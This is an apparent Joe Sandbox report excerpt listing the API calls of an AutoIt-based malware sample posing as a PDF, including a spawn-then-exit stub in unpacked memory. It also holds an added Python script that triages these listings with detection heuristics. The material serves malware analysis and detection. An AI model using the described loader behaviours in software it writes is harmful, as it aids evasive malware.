                                                      • Part of subcall function 0034C833: _wcscat.LIBCMT ref: 0034C968
                                                      • Part of subcall function 0034C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0034C978
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 805182592-1757145024
                                                    • Opcode ID: c42cf7c652a81b1610b424ef0a743d86c4788063d80a79d42577633149b6600c
                                                    • Instruction ID: 27e2171fe906ecae19c56f06a133c1fb902f2d66eb0ff333fa93b0583d0b68b3
                                                    • Opcode Fuzzy Hash: c42cf7c652a81b1610b424ef0a743d86c4788063d80a79d42577633149b6600c
                                                    • Instruction Fuzzy Hash: 52918271910229AFCF16EFA4CC91AEDB7B4FF05314F10442AF916AF691DB70AA04CB50
                                                    APIs
                                                      • Part of subcall function 00CED408: Sleep.KERNELBASE(000001F4), ref: 00CED419
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00CED649
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: O49OP75CAF49LLVF91VB
                                                    • API String ID: 2694422964-1611005959
                                                    • Opcode ID: 82b0282d8d7a8893d79d94d940bceddb80ae3f1b3e149a5a00e36b382db90dc2
                                                    • Instruction ID: afe02132b4ad676b89cc0bed92d72ac03a538a60ef99883ff2c7ae138e44c192
                                                    • Opcode Fuzzy Hash: 82b0282d8d7a8893d79d94d940bceddb80ae3f1b3e149a5a00e36b382db90dc2
                                                    • Instruction Fuzzy Hash: EB51C270D04289DBEF11DBE4C955BEEBB79AF18300F004199E609BB2C1D7B91B45CBA6
                                                    APIs
                                                    • _memset.LIBCMT ref: 003B3725
                                                    • GetOpenFileNameW.COMDLG32 ref: 003B376F
                                                      • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                                      • Part of subcall function 003440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X$t3?
                                                    • API String ID: 3777226403-4041524223
                                                    • Opcode ID: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                                    • Instruction ID: 971075d06acaf7fd3536dbcb2df73869b777bf38af95bcb0f1022e3102a71a6a
                                                    • Opcode Fuzzy Hash: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                                    • Instruction Fuzzy Hash: 142169719101989BDB03DF94D8457EE77F99F49304F004069E505AF241DBB466898F55
                                                    APIs
                                                    • __getstream.LIBCMT ref: 003634FE
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00363539
                                                    • __wopenfile.LIBCMT ref: 00363549
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                    • String ID: <G
                                                    • API String ID: 1820251861-2138716496
                                                    • Opcode ID: 0633de8086a8de84262a1adfc0eaf37d280d5dd1f49c343e34c32dc4b22bd15a
                                                    • Instruction ID: 20bdd8ba38f8fdff914c26f0aeac235dc833282fd97a1dac0a5675eef4e4fded
                                                    • Opcode Fuzzy Hash: 0633de8086a8de84262a1adfc0eaf37d280d5dd1f49c343e34c32dc4b22bd15a
                                                    • Instruction Fuzzy Hash: 1E11C670A002069BDB13BF768C4267E77A4AF46750B15C525F815DF289EF34CA1197A1
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0035D28B,SwapMouseButtons,00000004,?), ref: 0035D2BC
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2DD
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                                    • Instruction ID: 2ee3512c4fb750e0c9108746c56847c638bb119390db28d8d5db5799f1802c5c
                                                    • Opcode Fuzzy Hash: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                                    • Instruction Fuzzy Hash: 29117979611219BFDB228FA8DC84EAF7BBCEF04741F004829F805D7120E731AE489B60
                                                    APIs
                                                      • Part of subcall function 00344517: _fseek.LIBCMT ref: 0034452F
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C65D
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C670
                                                    • _free.LIBCMT ref: 0038C4DD
                                                    • _free.LIBCMT ref: 0038C4E4
                                                    • _free.LIBCMT ref: 0038C54F
                                                      • Part of subcall function 00361C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                                      • Part of subcall function 00361C9D: GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                                    • _free.LIBCMT ref: 0038C557
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                    • Instruction ID: 3a298e190d61ac3e31b4e4087ae939de3578d8d6f4964af97c39c611e3e0f6bf
                                                    • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                    • Instruction Fuzzy Hash: DB5161B1D04219AFDF159F65DC81BADBBB9EF48300F1044AEF219AB241DB716A80CF58
                                                    APIs
                                                    • _memset.LIBCMT ref: 0035EBB2
                                                      • Part of subcall function 003451AF: _memset.LIBCMT ref: 0034522F
                                                      • Part of subcall function 003451AF: _wcscpy.LIBCMT ref: 00345283
                                                      • Part of subcall function 003451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00345293
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0035EC07
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0035EC16
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003B3C88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: 147b0540786cb40bacaa452e56650464472c9585924d3166ee3ad1ce79fdcc1a
                                                    • Instruction ID: 906b142feed6a6513c0810dc15c0188a024c33ccaece97bcce06d0d6f0034c32
                                                    • Opcode Fuzzy Hash: 147b0540786cb40bacaa452e56650464472c9585924d3166ee3ad1ce79fdcc1a
                                                    • Instruction Fuzzy Hash: 2921C5709047949FE7379B688859FEBBFEC9B01308F05049DE68E66151C3746A848B51
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00CEC1AD
                                                    • ExitProcess.KERNEL32(00000000), ref: 00CEC1CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$CreateExit
                                                    • String ID: D
                                                    • API String ID: 126409537-2746444292
                                                    • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                    • Instruction ID: 96cc2f8950d2520b60cef32420e9a4caf873848a94a6c698ab90358ccc48b509
                                                    • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                    • Instruction Fuzzy Hash: D3F0127654028CABDB60EFE1CC49FEE777CBF04701F508509FB1A9A184DB7496489B61
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0038C72F
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0038C746
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                                    • Instruction ID: 3b3475a50070049f25676c854ee988d28d726909ee2bb0c94c65df92f8999031
                                                    • Opcode Fuzzy Hash: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                                    • Instruction Fuzzy Hash: 54D05E7150030EABDB11AB90DC0EFDAB76C9700704F0005A0B750E50B1DBB0E6998B54
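Three of the function blocks above carry the evidence an analyst actually triages from a listing like this: the CreateFileW and CreateProcessW/ExitProcess calls come from the 00CEB000 region, which the report marks "based on PE: false" (code not tied to a loaded image), and GetTempFileNameW is called with the prefix "aut", the AutoIt runtime's temp-file naming. The Python below is an added example for this page, not part of the Joe Sandbox report or of the sample: it parses report lines of the shape shown above (the input is constructed here by copying that shape) and applies three triage heuristics that are the editor's own assumptions, not detections the report states.

```python
"""Triage helper for the 'APIs' / 'Memory Dump Source' listings of a Joe Sandbox
function dump. Added example; the three rules are editor assumptions, not Joe Sandbox logic."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: report lines copied in the same shape as the listing on this page.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00CEC1AD
• ExitProcess.KERNEL32(00000000), ref: 00CEC1CC
Memory Dump Source
• Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0038C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0038C746
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
APIs
  • Part of subcall function 00CED408: Sleep.KERNELBASE(000001F4), ref: 00CED419
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00CED649
Memory Dump Source
• Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
"""

# One API line: bullet, optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (args), then ", ref: ADDR". LIBCMT entries carry no argument list.
API_RE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# The dump-source line says whether the region is backed by a PE image on disk.
SRC_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")


@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: bool  # True for "Part of subcall function" entries


@dataclass
class Block:
    calls: List[Call] = field(default_factory=list)
    offset: str = ""
    pe_backed: Optional[bool] = None  # None when no Memory Dump Source line was seen


def parse_report(text: str) -> List[Block]:
    """Group API lines into per-function blocks; each 'APIs' header opens a new one."""
    blocks: List[Block] = []
    current: Optional[Block] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Block()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.search(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            current.calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
            continue
        m = SRC_RE.search(line)
        if m:
            current.offset = m["offset"]
            current.pe_backed = m["pe"] == "true"
    return blocks


def triage(blocks: List[Block]):
    """Return (rule, offset, api_names) for each heuristic hit (rules are assumptions)."""
    findings = []
    for b in blocks:
        direct = [c.name for c in b.calls if not c.subcall]
        # 1. Direct API calls from a region not tied to a PE image: code written
        #    into memory at run time (unpacked or injected).
        if b.pe_backed is False and direct:
            findings.append(("unbacked-code", b.offset, direct))
        # 2. CreateProcessW followed by ExitProcess in one function: a stub that
        #    hands execution to a child and then removes itself.
        if "CreateProcessW" in direct and "ExitProcess" in direct \
                and direct.index("CreateProcessW") < direct.index("ExitProcess"):
            findings.append(("spawn-then-exit", b.offset, direct))
        # 3. GetTempFileNameW with prefix "aut": AutoIt runtime autXXXX.tmp files.
        for c in b.calls:
            if c.name == "GetTempFileNameW" and "aut" in c.args:
                findings.append(("autoit-temp-prefix", b.offset, [c.name]))
    return findings


if __name__ == "__main__":
    for rule, offset, apis in triage(parse_report(SAMPLE)):
        print(f"{rule:20} @ {offset}: {', '.join(apis)}")
```

Run against a whole exported report, the "unbacked-code" rule alone separates the AutoIt interpreter's own functions (all in the 00340000 image) from the second-stage code at 00CEB000; the other two rules only narrow down which of those blocks to read first.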
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                                    • Instruction ID: 62b399aeb6fecf95f0107ebcbceb751ec997694a31534d9c3115669836e480b3
                                                    • Opcode Fuzzy Hash: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                                    • Instruction Fuzzy Hash: 25F159716083019FCB11DF24C885B6AB7E5FF89314F14896EF9959B292DB70E905CB82
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00363973
                                                      • Part of subcall function 003681C2: __NMSG_WRITE.LIBCMT ref: 003681E9
                                                      • Part of subcall function 003681C2: __NMSG_WRITE.LIBCMT ref: 003681F3
                                                    • __NMSG_WRITE.LIBCMT ref: 0036397A
                                                      • Part of subcall function 0036821F: GetModuleFileNameW.KERNEL32(00000000,00400312,00000104,00000000,00000001,00000000), ref: 003682B1
                                                      • Part of subcall function 0036821F: ___crtMessageBoxW.LIBCMT ref: 0036835F
                                                      • Part of subcall function 00361145: ___crtCorExitProcess.LIBCMT ref: 0036114B
                                                      • Part of subcall function 00361145: ExitProcess.KERNEL32 ref: 00361154
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                                    • Instruction ID: 1b835ed1e0892a040fdc324af367b75f3a70c1d7723df7ddb4bef3d5a4496868
                                                    • Opcode Fuzzy Hash: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                                    • Instruction Fuzzy Hash: 740192312456119AE6233B25DC52B2A23989F82764F668129F5059F19ADFB09D008AA4
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0038C385,?,?,?,?,?,00000004), ref: 0038C6F2
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0038C708
                                                    • CloseHandle.KERNEL32(00000000,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C70F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                                    • Instruction ID: 44b237fbc18a97c9cdbda25d4e3d5f24d687ff6df216fbf4fac2b0e6a77f7841
                                                    • Opcode Fuzzy Hash: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                                    • Instruction Fuzzy Hash: F4E08632140214BBD7222B54AC0EFCA7B1CAB45760F144120FB54A90E097B135118798
                                                    APIs
                                                    • _free.LIBCMT ref: 0038BB72
                                                      • Part of subcall function 00361C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                                      • Part of subcall function 00361C9D: GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                                    • _free.LIBCMT ref: 0038BB83
                                                    • _free.LIBCMT ref: 0038BB95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                    • Instruction ID: 8f8799d6127825cedef9f84a9ee38679867bea7729602f1723908ec512da8ead
                                                    • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                    • Instruction Fuzzy Hash: B2E05BA174174247DA3775796E44EB753CC4F043517190C5DB459EB14ADF24F84086B8
                                                    APIs
                                                      • Part of subcall function 003422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003424F1), ref: 00342303
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003425A1
                                                    • CoInitialize.OLE32(00000000), ref: 00342618
                                                    • CloseHandle.KERNEL32(00000000), ref: 003B503A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID:
                                                    • API String ID: 3815369404-0
                                                    • Opcode ID: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                                    • Instruction ID: 6afaa12977dfd032274a04c6acdb1018f320e2126454851369db03f8b697351a
                                                    • Opcode Fuzzy Hash: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                                    • Instruction Fuzzy Hash: F071AEB49013858BD30AEF6AAE90855BBE4FB9934479041BEE50AFB7B2CB745404CF1D
                                                    APIs
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __getbuf.LIBCMT ref: 00368EFA
                                                    • __lseeki64.LIBCMT ref: 00368F6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                                    • String ID:
                                                    • API String ID: 3311320906-0
                                                    • Opcode ID: d7a5dc2195a5021168156bb59c3be48acf63d4a72a61fd59e19fbe2db0d92270
                                                    • Instruction ID: eed619c14a088ba34d3a01b8ab256a51a08c8f388f5a9fa503a7c92acb8e2341
